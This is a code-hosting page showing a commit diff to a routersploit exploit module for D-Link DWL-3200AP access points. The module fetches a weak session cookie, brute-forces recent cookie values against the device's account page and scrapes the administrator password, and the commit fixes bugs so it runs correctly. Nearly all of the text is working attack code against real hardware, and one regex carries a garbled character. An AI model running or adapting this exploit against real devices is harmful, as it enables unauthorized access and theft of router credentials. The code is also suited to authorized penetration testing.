Skip to content

R
routersploit
Commit aae60fb8 by lucyoa
Options

Fixing minor bugs, methods, type conversion

parent 514a62eb
Showing with 13 additions and 9 deletions
routersploit/modules/exploits/dlink/dwl_3200ap_password_disclosure.py
...@@ -14,11 +14,11 @@ from routersploit import ( ...@@ -14,11 +14,11 @@ from routersploit import (
class Exploit(exploits.Exploit): class Exploit(exploits.Exploit):
""" """
Exploits DLINK DWL3200 access points weak cookie value Exploits D-Link DWL-3200AP access points weak cookie value
""" """
__info__ = { __info__ = {
'name': 'D-Link AP 3200 - Password Disclosure', 'name': 'D-Link DWL-3200AP Password Disclosure',
'description': 'Exploits DLINK DWL3200 access points weak cookie value', 'description': 'Exploits D-Link DWL3200 access points weak cookie value',
'authors': [ 'authors': [
'pws', # Vulnerability discovery 'pws', # Vulnerability discovery
'Josh Abraham <sinisterpatrician[at]google.com>', # routersploit module 'Josh Abraham <sinisterpatrician[at]google.com>', # routersploit module
...@@ -27,21 +27,25 @@ class Exploit(exploits.Exploit): ...@@ -27,21 +27,25 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/34206/', 'https://www.exploit-db.com/exploits/34206/',
], ],
'devices': [ 'devices': [
'DLINK DWL3200', 'D-Link DWL-3200AP',
], ],
} }
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port port = exploits.Option(80, 'Target port') # default port
# 3600 seconds - one hour means that we will bruteforce authenticated cookie value that was valid within last hour
seconds = exploits.Option(3600, 'Number of seconds in the past to bruteforce')
def run(self): def run(self):
if self.check(): if self.check():
cookie_value = self.get_cookie() cookie_value = self.get_cookie()
print_success("Cookie retrieved: {}".format(cookie_value)) print_success("Cookie retrieved: {}".format(cookie_value))
cookie_int = int(cookie_value, 16) cookie_int = int(cookie_value, 16)
start = cookie_int - 3600 start = cookie_int - int(self.seconds)
print_status("Starting bruteforcing cookie value...")
for i in xrange(cookie_int, start, -1): for i in xrange(cookie_int, start, -1):
self.test_cookie(i) self.test_cookie(i)
else: else:
...@@ -74,14 +78,14 @@ class Exploit(exploits.Exploit): ...@@ -74,14 +78,14 @@ class Exploit(exploits.Exploit):
except Exception: except Exception:
print_error("Unable to connect to target") print_error("Unable to connect to target")
def test_cookie(cookie_int, self): def test_cookie(self, cookie_int):
""" """
Method that tests all cookies from past hour to find one that is valid Method that tests all cookies from the past to find one that is valid
""" """
url = "{}:{}/html/tUserAccountControl.htm".format(self.target, self.port) url = "{}:{}/html/tUserAccountControl.htm".format(self.target, self.port)
cookie = dict(RpWebID=cookie_int) cookies = dict(RpWebID=str(cookie_int))
try: try:
r = http_request(method='GET', url=url, cookie=cookie, timeout=10) r = http_request(method='GET', url=url, cookies=cookies, timeout=10)
if ('NAME="OldPwd"' in r.text): if ('NAME="OldPwd"' in r.text):
print_success("Cookie {} is valid!".format(cookie_int)) print_success("Cookie {} is valid!".format(cookie_int))
pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\"" pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\""
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment